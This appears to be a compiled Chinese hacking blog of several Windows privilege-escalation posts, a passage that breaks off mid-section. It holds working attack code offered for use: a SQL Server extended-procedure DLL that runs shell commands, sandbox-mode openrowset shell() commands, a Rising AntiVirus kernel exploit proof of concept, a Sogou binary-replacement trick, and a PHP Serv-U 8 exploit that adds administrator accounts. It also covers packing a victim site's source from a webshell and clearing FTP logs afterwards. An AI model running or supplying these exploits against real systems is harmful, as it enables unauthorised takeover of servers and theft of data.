主要代码：

在VC6里面新建一个储存过程项目，在proc.cpp中写入如下代码：

#include <stdafx.h>

#include <shellapi.h>

#define XP_NOERROR 0

#define XP_ERROR 1

#define MAXCOLNAME 25

#define MAXNAME 25

#define MAXTEXT 255

#ifdef __cplusplus

extern “C” {

#endif

RETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc);

#ifdef __cplusplus

}

#endif

RETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc)

{

/***************************** 说明 *************************

由于本人人品不好还是怎么的，库里没有srv_paraminfo函数，卧槽，

无赖之下，只好用老式的srv_paramdata

*************************************************************/

int bufLen;

DBCHAR spName[MAXNAME];

DBCHAR spText[MAXTEXT];

DBCHAR spBuf[MAXTEXT];

unsigned char cmdline[255] = “”;

if(srv_rpcparams(srvproc) != 1) return XP_ERROR; //参数判断，如果参数不是1个就立即退出

bufLen = srv_paramlen(srvproc,1);

if(!bufLen) return XP_ERROR;

wsprintf(spBuf,(DBCHAR*)srv_paramdata(srvproc,1));spBuf[bufLen] = ‘\0′; //获取第一个参数的值

wsprintf(spName, “xp_hello”);

wsprintf(spText, “%s Run command:[%s]\r\n\t\t\tMSN:ylbhz@hotmail.com”, spName,spBuf);

srv_sendmsg(srvproc,SRV_MSG_INFO,0,(DBTINYINT)0,(DBTINYINT)0,NULL,0,0,spText,SRV_NULLTERM); //发送消息

wsprintf((char*)cmdline,”/c %s”,spBuf); //构造参数

ShellExecute(0,”open”,”cmd.exe”,(char*)cmdline,NULL,SW_SHOW); //执行命令

return XP_NOERROR ;

}

编译生成xp_hello.dll

以SA连接SQL Server 执行

dbcc addextendedproc(‘xp_hello’,'c:\xp_hello.dll’);

提示成功过后，调用

exec xp_hello ‘net user fuck fuck /add’;

这样系统里面就多了个fuck账户

C:\Documents and Settings\Administrator\桌面\工作区间\C\Debug>net user

\\PC-200910151119 的用户帐户

—————————————————————————–
Administrator ASPNET fuck
Guest HelpAssistant IUSR_PC-200910151119
IWAM_PC-200910151119 SQLDebugger SUPPORT_388945a0
VUSR_PC-200910151119
命令成功完成。

相关文章

• 2007年12月10日 -- sa 无xp_cmdshell下提限又一简单方法
• 2010年04月23日 -- rar.exe在提权中的妙用
• 2010年04月20日 -- 沙盒提权的小tips
• 2010年01月31日 -- 瑞星本地提权通杀利用代码
• 2009年12月22日 -- 关于搜狗拼音输入法提权的应用
• 2009年08月5日 -- Serv-U FTP Server v8 本地提权
• 2009年07月24日 -- xml.http 下载拿SHELL
• 2009年07月23日 -- 针对Dbowner权限下的提权脚本(转)
• 2009年06月25日 -- sa权限下无xp_cmdshell下取权限又一简单方法
• 2009年05月14日 -- 关于html本地权限问题

好了现在来介绍它的用法吧！得到了Webshell后，最好自己传一个rar.exe，虽然program files目录有，但是有时执行不了。rar.exe体积200K，呵呵！将就下。在CMDSHELL执行:D:1Rar.exe a -k -r -s -m1 E:web1.rar E:web。我来介绍下吧,"D:1rar.exe"是你上传的rar.exe,后面参数我会给大家放在下面；"E:web1.rar"是你压缩的文件存放的位置(在shell中一定要选能写的目录);"E:web"是你要打包的目录。很简单吧？以后在没有得到服务器，大家可以尝试我介绍的方法，下载整站源码。
rar.exe参数:

a 添加文件到压缩文件中
-k 锁定压缩文件
-s产生固体存档，这样可以增大压缩比
-r包括子目录
-m1 设置压缩比
-m0 存储 添加到压缩文件时不压缩文件。
-m1 最快 使用最快方式（低压缩）
-m2 较快 使用快速压缩方式
-m3 标准 使用标准（默认）压缩方式
-m4 较好 使用较好压缩方式（较好压缩，但是慢）
-m5 最好 使用最大压缩方式（最好的压缩，但是最慢）Sample Text

相关文章

• 2010年08月26日 -- xp_hello.dll(sa) 提权
• 2010年04月20日 -- 沙盒提权的小tips
• 2010年01月31日 -- 瑞星本地提权通杀利用代码
• 2009年12月22日 -- 关于搜狗拼音输入法提权的应用
• 2009年08月5日 -- Serv-U FTP Server v8 本地提权
• 2009年07月23日 -- 针对Dbowner权限下的提权脚本(转)
• 2009年05月14日 -- 关于html本地权限问题
• 2008年10月16日 -- Windows XP 核心驱动 AFD.sys 本地权限提升漏洞分析(MS08-066)
• 2008年10月10日 -- 提权的一些小集合
• 2007年12月10日 -- sa 无xp_cmdshell下提限又一简单方法

当然有了webshell，无法满足我们贪婪的欲望。开始测试提权。有serv-u，但是提权失败了。也许大家会说用back log来提权。但是那个太慢了，要重启机器，会影响对方业务，同时又会给对方留下不好的印像。有人也许会说用读取系统账号的注册表，导入导出，克隆账号，这个办法也可行，但由于并非黑对方主机，还是要保证对方系统的安整性比较好。（也许是心理因素，^_^)

最后只好试试沙盒模式。很多人SA直接用沙盒模式成功了好多机器，但我从来没实践过，也不太清楚成功率如何。只好拿他当回肉鸡尝试了。

由于扩展被删除，先恢复对注册表的读写存储。

dbcc addextendedproc ('xp_regread','xpstar.dll')

dbcc addextendedproc ('xp_regwrite','xpstar.dll')

修复沙盒的保护模式

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0;--

查看'SandBoxMode'值是否已经变成0了。

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines', 'SandBoxMode'

最后调用沙盒模式

select * from openrowset('microsoft.jet.oledb.4.0',';database=C:WINDOWSsystem32iasdnary.mdb','select shell("cmd.exe /c net user user passwd /add")')

1.如果沙盒保护模式未“关闭”，会报错：

服务器: 消息 7357，级别 16，状态 2，行 1
未能处理对象 'select shell("cmd.exe /c net user user passwd /add")'。OLE DB 提供程序 'microsoft.jet.oledb.4.0' 指出该对象中没有任何列。
OLE DB 错误跟踪［Non-interface error: OLE DB provider unable to process object, since the object has no columnsProviderName='microsoft.jet.oledb.4.0', Query=select shell("cmd.exe /c net user user passwd /add")'］。

2.如果.mdb不存在或是输入路径错误

服务器: 消息 7399，级别 16，状态 1，行 1
OLE DB 提供程序 'microsoft.jet.oledb.4.0' 报错。
[OLE/DB provider returned message: 找不到文件 'C:WINDOWSsystem32iasdnary1.mdb'。]
OLE DB 错误跟踪［OLE/DB Provider 'microsoft.jet.oledb.4.0' IDBInitialize::Initialize returned 0x80004005:   ］。

3.如果输入过程中多了一些空格，也会报错。尤其要注意这点，很多人直接网上找文章复制粘贴进去执行。

服务器: 消息 7357，级别 16，状态 2，行 1
未能处理对象 'select shell("cmd.exe /c net user user passwd /add")'。OLE DB 提供程序 'microsoft.jet.oledb.4.0' 指出该对象中没有任何列。
OLE DB 错误跟踪［Non-interface error: OLE DB provider unable to process object, since the object has no columnsProviderName='microsoft.jet.oledb.4.0', Query=select shell("cmd.exe /c net user user passwd /add")'］。

4.如果mdb权限和cmd.exe权限不对，同样会也出现问题。

当mdb权限不对时，

服务器: 消息 7320，级别 16，状态 2，行 1
未能对 OLE DB 提供程序 'Microsoft.Jet.OLEDB.4.0' 执行查询。
[OLE/DB provider returned message: 未知]
OLE DB 错误跟踪［OLE/DB Provider 'Microsoft.Jet.OLEDB.4.0' ICommandText::Execute returned 0x80040e14］。

5.如果net权限不对时，却没有任何提示。

最终的提权办法就是在当前的web目录下面上传系统的ias.mdb和cmd.exe，net.exe三个文件。执行

select * from openrowset('microsoft.jet.oledb.4.0',';database=E:webias.mdb','select shell("E:webcmd.exe /c E:webnet.exe user user passwd /add")')

成功增加一个计算机用户。

相关文章

• 2008年10月9日 -- 沙盒模式提权
• 2010年08月26日 -- xp_hello.dll(sa) 提权
• 2010年04月23日 -- rar.exe在提权中的妙用
• 2010年01月31日 -- 瑞星本地提权通杀利用代码
• 2009年12月22日 -- 关于搜狗拼音输入法提权的应用
• 2009年08月5日 -- Serv-U FTP Server v8 本地提权
• 2009年07月23日 -- 针对Dbowner权限下的提权脚本(转)
• 2009年05月14日 -- 关于html本地权限问题
• 2008年10月16日 -- Windows XP 核心驱动 AFD.sys 本地权限提升漏洞分析(MS08-066)
• 2008年10月10日 -- 提权的一些小集合

//MY Blog:http://hi.baidu.com/9908006

//MY QQ:165659238

//VC-ConsoleWithApi

#include "stdafx.h"

#include "windows.h"

enum { SystemModuleInformation = 11 };

typedef struct {

ULONG Unknown1;

ULONG Unknown2;

PVOID Base;

ULONG Size;

ULONG Flags;

USHORT Index;

USHORT NameLength;

USHORT LoadCount;

USHORT PathLength;

CHAR ImageName[256];

} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {

ULONG Count;

SYSTEM_MODULE_INFORMATION_ENTRY Module[1];

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

HANDLE g_RsGdiHandle = 0 ;

void __stdcall WriteKVM(PVOID Address , ULONG Value)

{

ULONG ColorValue = Value ;

ULONG btr ;

ULONG ColorBuffer = 0 ;

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

&ColorBuffer ,

sizeof(ULONG),

&btr ,

0

);

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

Address ,

sizeof(ULONG),

&btr ,

0

);

return ;

}

void AddCallGate()

{

ULONG Gdt_Addr;

ULONG CallGateData[0x4];

ULONG Icount;

__asm

{

push edx

sgdt [esp-2]

pop edx

mov Gdt_Addr , edx

}

__asm

{

push 0xc3

push Gdt_Addr

call WriteKVM

mov eax,Gdt_Addr

mov word ptr[CallGateData],ax

shr eax,16

mov word ptr[CallGateData+6],ax

mov dword ptr[CallGateData+2],0x0ec0003e8

mov dword ptr[CallGateData+8],0x0000ffff

mov dword ptr[CallGateData+12],0x00cf9a00

xor eax,eax

LoopWrite:

mov edi,dword ptr CallGateData[eax]

push edi

mov edi,Gdt_Addr

add edi,0x3e0

add edi,eax

push edi

mov Icount,eax

call WriteKVM

mov eax,Icount

add eax , 0x4

cmp eax,0x10

jnz LoopWrite

}

return ;

}

void IntoR0(PVOID function)

{

WORD Callgt[3];

Callgt[0] = 0;

Callgt[1] = 0;

Callgt[2] = 0x3e3;

__asm

{

call fword ptr[Callgt]

mov eax,esp

mov esp,[esp+4]

push eax

call function

pop esp

push offset ring3Ret

retf

ring3Ret:

nop

}

return ;

}

#pragma pack(1)

typedef struct _IDTR

{

SHORT IDTLimit;

UINT IDTBase;

}IDTR,

*PIDTR,

**PPIDTR;

#pragma pack()

ULONG g_RealSSDT = 0 ;

ULONG ServiceNum = 0 ;

ULONG OrgService [0x1000] ;

ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)

{

ULONG Offset = Rva, Limit;

IMAGE_SECTION_HEADER *Img;

WORD i;

Img = IMAGE_FIRST_SECTION(NT);

if (Rva < Img->PointerToRawData)

return Rva;

for (i = 0; i < NT->FileHeader.NumberOfSections; i++)

{

if (Img.SizeOfRawData)

Limit = Img.SizeOfRawData;

else

Limit = Img.Misc.VirtualSize;

if (Rva >= Img.VirtualAddress &&

Rva < (Img.VirtualAddress + Limit))

{

if (Img.PointerToRawData != 0)

{

Offset -= Img.VirtualAddress;

Offset += Img.PointerToRawData;

}

return Offset;

}

}

return 0;

}

#define ibaseDD *(PDWORD)&ibase

DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)

{

PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase;

if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];

if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));

*poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));

if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;

*psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));

return TRUE;

}

typedef struct {

WORD offset:12;

WORD type:4;

} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))

DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)

{

PIMAGE_FILE_HEADER pfh;

PIMAGE_OPTIONAL_HEADER poh;

PIMAGE_SECTION_HEADER psh;

PIMAGE_BASE_RELOCATION pbr;

PIMAGE_FIXUP_ENTRY pfe;

DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;

BOOL bFirstChunk;

GetHeaders((PCHAR)hModule,&pfh,&poh,&psh);

if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&

(!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {

pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);

bFirstChunk=TRUE;

while (bFirstChunk || pbr->VirtualAddress) {

bFirstChunk=FALSE;

pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {

if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {

dwFixups++;

dwPointerRva=pbr->VirtualAddress+pfe->offset;

dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

if (dwPointsToRva==dwKSDT)

{

if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)

{

dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;

*ImageBase = poh->ImageBase;

return dwKiServiceTable;

}

}

}

}

*(PDWORD)&pbr+=pbr->SizeOfBlock;

}

}

return 0;

}

DWORD CR0Reg ;

ULONG realssdt ;

void InKerneProc()

{

__asm

{

cli

mov eax, cr0

mov CR0Reg,eax

and eax,0xFFFEFFFF

mov cr0, eax

}

int i;

for (i = 0; i < (int)ServiceNum; i++)

{

*(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService;

}

__asm

{

mov eax, CR0Reg

mov cr0, eax

sti

}

}

int main(int argc, char* argv[])

{

printf("Rising AntiVirus 2008 ~ 2010 n"

"Local Privilege Escalation Vulnerability Proof Of Concept Exploitn 2010-1-27n");

g_RsGdiHandle = CreateFile("[url=]\\.\RSNTGDI[/url]" ,

0,

FILE_SHARE_READ | FILE_SHARE_WRITE ,

0,

OPEN_EXISTING , 0 , 0 );

if (g_RsGdiHandle == INVALID_HANDLE_VALUE)

{

return 0 ;

}

SYSTEM_MODULE_INFORMATION ModuleInfo ;

// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address

HMODULE hlib = GetModuleHandle("ntdll.dll");

PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation");

ULONG infosize = sizeof(ModuleInfo);

__asm

{

push 0

push infosize

lea eax , ModuleInfo

push eax

push 11

call pNtQuerySystemInformation

}

HMODULE KernelHandle ;

LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

// Load the kernel image specified

KernelHandle = LoadLibrary(ntosname);

if (KernelHandle == 0 )

{

return 0 ;

}

ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable");

if (KeSSDT == 0 )

{

return 0 ;

}

ULONG ImageBase = 0 ;

ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &ImageBase);

if (KiSSDT == 0 )

{

return 0 ;

}

KiSSDT += (ULONG)KernelHandle;

ServiceNum = 0x11c ;

ULONG i ;

for (i = 0 ; i < ServiceNum ; i ++)

{

OrgService = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;

}

realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;

SetThreadAffinityMask(GetCurrentThread () , 0 ) ;

AddCallGate();

IntoR0(InKerneProc);

return 0;

}

相关文章

• 2010年08月26日 -- xp_hello.dll(sa) 提权
• 2010年06月10日 -- 你还敢执行txt文件吗？Windows 0day
• 2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞
• 2010年04月23日 -- rar.exe在提权中的妙用
• 2010年04月23日 -- Shopex V4.8.4 V4.8.5 0Day 通杀
• 2010年04月20日 -- 沙盒提权的小tips
• 2010年04月1日 -- PDF最新0day
• 2010年03月24日 -- Firefox 3.6 0day被补了
• 2010年03月10日 -- DedeCms v5.5 0day
• 2010年01月20日 -- IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告

乍看这目录，显然自动升级程序 pinyinup.exe 应该是首选，在自己机器上测试了一下，用计算器替换了源文件，不过等了半天不运行，重启也一样。虽然肯定会运行，但还是希望有更有效率的方法。仔细看了一 下，每次启动系统后，搜狗的ImeUtil.exe 都会启动，那就替换它了，结果肯定是成功的。但感觉不够，越多可换的就越好。让效率达到最高。这时觉得这种简单的事情应该有人已经做过了，百度一下取取 经，不出所料，已经有人这么做过了，这位仁兄替换的也是PinyinUp.exe，但这样就满足了，没有继续了。

除了imeutil.exe ， pinyinup.exe 之外还有几个DLL文件。肯定是要加载的。找了popup.dll下手，做好的popup.dll 替换了原先的，重启测试，执行了。如果替换3个的话，我想达到效果的速度会快一些

做了个imeutil.exe 和 popup.dll ，供懒人使用，建议替换之前先备份原文件，达到目的后恢复原状。成功执行的话会在系统中添加一个管理员，用户名和密码都是sunwear

附件地址：sogou.rar

相关文章

• 2010年08月26日 -- xp_hello.dll(sa) 提权
• 2010年04月23日 -- rar.exe在提权中的妙用
• 2010年04月20日 -- 沙盒提权的小tips
• 2010年01月31日 -- 瑞星本地提权通杀利用代码
• 2009年08月5日 -- Serv-U FTP Server v8 本地提权
• 2009年07月23日 -- 针对Dbowner权限下的提权脚本(转)
• 2009年05月14日 -- 关于html本地权限问题
• 2008年10月16日 -- Windows XP 核心驱动 AFD.sys 本地权限提升漏洞分析(MS08-066)
• 2008年10月10日 -- 提权的一些小集合
• 2007年12月10日 -- sa 无xp_cmdshell下提限又一简单方法

发布日期：2009-08-05
更新日期：2009-08-05

受影响系统：
serv-u8

不受影响系统：
其他版本不受影响

描述：
看cnbeta发现su出8这个版本了。
想想以前写过一个7的本地提权。
不知道8有什么安全方面的更改。
下载来研究下，发现居然还是可以提权的，只是su7的那个不能直接用，稍微修改了下执行的流程。

Su8的管理平台是http的，继承了su7的方式。
抓包，分析，发现了以下路程是可以利用的。
1， 管理员从管理控制台打开web页面时，是不需要验证密码的。
2， 管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3， 管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。
4， 管理员添加了用户的这个包和设置权限这个包，是分开的。
所以，我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆，exec命令。达到提权。

前面su7已经说了很多，这里简单的说下好了。
.....登陆什么的。
1，获取ID。
2，给这个id添加权限。
3，给这个id赋予用户名，密码，目录，权限。
4，登陆后执行系统命令。

这段代码是不能直接当工具使用的。

<*来源：kxlzx（www.inbreak.net）
*>

测试方法：

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?
/*
serv-u 8 local exp ver 1.0
如果你在自己的服务器上发现这个文件，厄。。。那太遗憾了，别来找我。
这个文件到处都是，人人都能拿到。
*/

?>
<html>
<title>Serv-u 8 local exp ver 1.0</title>
<body>
<script>
function fun_showDiv(show)
{
document.getElementById(show).style.display="block";
}
</script>
<b>Serv-u 8 local exp ver 1.0</b>
<form id="form1" name="form1" method="post" action="?">
<p><a href="#" onclick="fun_showDiv('adminpassdiv')">管理员密码</a>
<input type="text" name="admin_pwd" value="" />
</p>
<p>直接提权！
<input type="submit" name="cmd" value="提权" />
<a href="#" onclick="fun_showDiv('QAdiv')">QA</a>
</p>
<pre>

<?

//Global var
$port=43958;
$host="127.0.0.1";
$sessionid="";
$getuserid="";
$ftpport=21;
$ftpuser="lalala_hacked";
$ftppwd=$_POST['admin_pwd'];
$exec_addUser="site exec c:/windows/system32/net.exe user ".$ftpuser." ".$ftppwd." /add";
$exec_addGroup="site exec c:/windows/system32/net.exe localgroup administrators ".$ftpuser."  /add";

if($_POST['cmd']) {

//login-----------------------------------------
$sock_login = fsockopen($host, $port);
$URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';
$post_data_login['user'] = "";
$post_data_login['pword'] = $ftppwd;
$post_data_login['language'] = "zh%2CCN&";
$ref="http://".$host.":".$port."/?Session=39893&Language=zh,CN&LocalAdmin=1";
$postStr = createRequest($port,$host,$URL,$post_data_login,$sessionid,$ref);
fputs($sock_login, $postStr);
$result = fread($sock_login, 1280);
$sessionid = getmidstr("<sessionid>","</sessionid>",$result);
if ($sessionid!="")
echo "登陆成功！";
fclose($sock_login);
//login-----------------------------------------

//getOrganizationId-------------------------------
$OrganizationId="";
$sock_OrganizationId = fsockopen($host, $port);
$URL='/Admin/ServerUsers.htm?Page=1';
$postStr = createRequest($port,$host,$URL,"",$sessionid,"");
fputs($sock_OrganizationId, $postStr);
$resultOrganizationId="";
while(!feof($sock_OrganizationId)) {
$result = fread($sock_OrganizationId, 1024);
$resultOrganizationId=$resultOrganizationId.$result;
}
$strTmp = "OrganizationUsers.xml&ID=";
$OrganizationId = substr($resultOrganizationId,strpos($resultOrganizationId,$strTmp)+strlen($strTmp),strlen($strTmp)+15);
$OrganizationId = substr($OrganizationId,0,strpos($OrganizationId,"\""));
fclose($sock_OrganizationId);
if ($OrganizationId!="")
echo "获取OrganizationId".$OrganizationId."成功！";
//getOrganizationId-------------------------------

//getuserid---------------------------------------
$getuserid="";
$sock_getuserid = fsockopen($host, $port);
$URL="/Admin/XML/User.xml?Command=AddObject&Object=COrganization.".$OrganizationId.".User&Temp=1&Sync=546666666666666663";
$ref="http://".$host.":".$port."/Admin/ServerUsers.htm?Page=1";
$post_data_getuserid="";
$postStr = createRequest($port,$host,$URL,$post_data_getuserid,$sessionid,$ref);
fputs($sock_getuserid, $postStr);
$result = fread($sock_getuserid, 1280);
$result = getmidstr("<var name=\"ObjectID\" val=\"","\" />",$result);
fclose($sock_getuserid);
$getuserid = $result;
if ($getuserid!="")
echo "获取用户ID".$getuserid."成功！";
//getuserid---------------------------------------

//addpower-----------------------------------------
$sock_addpower = fsockopen($host, $port);
$URL="/Admin/XML/Result.xml?Command=AddObject&Object=CUser.".$getuserid.".DirAccess&Sync=1227081437828";
$post_data_addpower['Access'] = "7999";
$post_data_addpower['MaxSize'] = "0";
$post_data_addpower['Dir'] = "c:\\";
$post_data_addpower['undefined'] = "undefined";
$postStr = createRequest($port,$host,$URL,$post_data_addpower,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");
fputs($sock_addpower, $postStr,strlen($postStr));
$result = fread($sock_addpower, 1280);
fclose($sock_addpower);

echo "添加权限成功！";

//addpower-----------------------------------------

//adduser-----------------------------------------
$sock_adduser = fsockopen($host, $port);
$URL="/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.".$OrganizationId.".User.".$getuserid."&Sync=1227071190250";
$post_data_adduser['LoginID'] = $ftpuser;
$post_data_adduser['FullName'] = "";
$post_data_adduser['Password'] = 'hahaha';
$post_data_adduser['ComboPasswordType'] = "%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81";
$post_data_adduser['PasswordType'] = "0";
$post_data_adduser['ComboAdminType'] = "%E6%97%A0%E6%9D%83%E9%99%90";
$post_data_adduser['AdminType'] = "";
$post_data_adduser['ComboHomeDir'] = "/c:";
$post_data_adduser['HomeDir'] = "/c:";
$post_data_adduser['ComboType'] = "%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7";
$post_data_adduser['Type'] = "0";
$post_data_adduser['ExpiresOn'] = "0";
$post_data_adduser['ComboWebClientStartupMode'] = "%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF";
$post_data_adduser['WebClientStartupMode'] = "";
$post_data_adduser['LockInHomeDir'] = "0";
$post_data_adduser['Enabled'] = "1";
$post_data_adduser['AlwaysAllowLogin'] = "1";
$post_data_adduser['Description'] = "";
$post_data_adduser['IncludeRespCodesInMsgFiles'] = "";
$post_data_adduser['ComboSignOnMessageFilePath'] = "";
$post_data_adduser['SignOnMessageFilePath'] = "";
$post_data_adduser['SignOnMessage'] = "";
$post_data_adduser['SignOnMessageText'] = "";
$post_data_adduser['ComboLimitType'] = "%E8%BF%9E%E6%8E%A5";
$post_data_adduser['LimitType'] = "Connection";
$post_data_adduser['QuotaBytes'] = "0";
$post_data_adduser['Quota'] = "0";
$post_data_adduser['Access'] = "7999";
$post_data_adduser['MaxSize'] = "0";
$post_data_adduser['Dir'] = "%25HOME%25";
$postStr = createRequest($port,$host,$URL,$post_data_adduser,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");
fputs($sock_adduser, $postStr,strlen($postStr));
$result = fread($sock_adduser, 1280);
fclose($sock_adduser);

echo "添加用户成功！";
//adduser-----------------------------------------

//exec-------------------------------
$sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "USER ".$ftpuser."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);

$sendbuf = "PASS hahaha";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);

$sendbuf = $exec_addUser."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1024);
echo "执行".$exec_addUser."返回了$recvbuf";
fclose($sock_exec);

$sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "USER ".$ftpuser."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);

$sendbuf = "PASS hahaha";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);

$sendbuf = $exec_addGroup."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1024);

echo "执行".$exec_addGroup."返回了$recvbuf";
fclose($sock_exec);
echo "好了，自己3389上去清理ftp用户日志吧！";
//exec-------------------------------

}

/** function createRequest
@port_post : administrator port $port=43958;
@host_post : host $host="127.0.0.1";
@URL_post : target $URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';
@post_data_post : arraylist $post_data['user'] = "";...
@return httprequest string
*/
function createRequest($port_post,$host_post,$URL_post,$post_data_post,$sessionid,$referer){
$data_string="";
if ($post_data_post!="")
{
foreach($post_data_post as $key=>$value)
{
$values[]="$key=".urlencode($value);
}
$data_string=implode("",$values);
}
$request.="POST ".$URL_post." HTTP/1.1";
$request.="Host: ".$host_post."";
$request.="Referer: ".$referer."";
$request.="Content-type: application/x-www-form-urlencoded";
$request.="Content-length: ".strlen($data_string)."";
$request.="User-Agent: Serv-U";
$request.="x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)";
$request.="Accept: */*";
$request.="Cache-Contro: no-cache";
$request.="UA-CPU: x86";

if ($sessionid!="")
{
$request.="Cookie: Session=".$sessionid."";
}
$request.="";
$request.=$data_string."";

return $request;
}

//getMidfor2str copy from internet
function getmidstr($L,$R,$str)
{
$int_l=strpos($str,$L);
$int_r=strpos($str,$R);
If ($int_l>-1&&$int_l>-1)
{
$str_put=substr($str,$int_l+strlen($L),($int_r-$int_l-strlen($L)));
return $str_put;
}
else
return "没找到需要的变量";
}
?>
</pre>
</form>
<div id="adminpassdiv" style="display:none">
<pre>
默认为空，如果密码为空，<b>填什么都能进去。</b>
如果修改过，管理员密码默认会在这里：
<b>C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive</b>
文件中找到一个MD5密码值。
C:\Program Files\RhinoSoft.com\Serv-U
是su的根目录。
密码值的样式为(假设是123456)
kx#######################
#代表123456的32位MD5加密，而kx则是su对md5的密码算法改进的随机2位字符。
破解后的密码为<b>kx</b>123456，去掉kx就是密码了。
你可以针对这个加密生成字典。

</pre>
</div>
<div id="QAdiv" style="display:none">
<pre>
<b>提权的原理？</b>
Su8的管理平台是http的，继承了su7的方式。
抓包，分析，发现了以下路程是可以利用的。
1，  管理员从管理控制台打开web页面时，是不需要验证密码的。
2，  管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3，  管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。
4，  管理员添加了用户的这个包和设置权限这个包，是分开的。
所以，我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆，exec命令。达到提权。

前面su7已经说了很多，这里简单的说下好了。
.....登陆什么的。
1，获取ID。
2，给这个id添加权限。
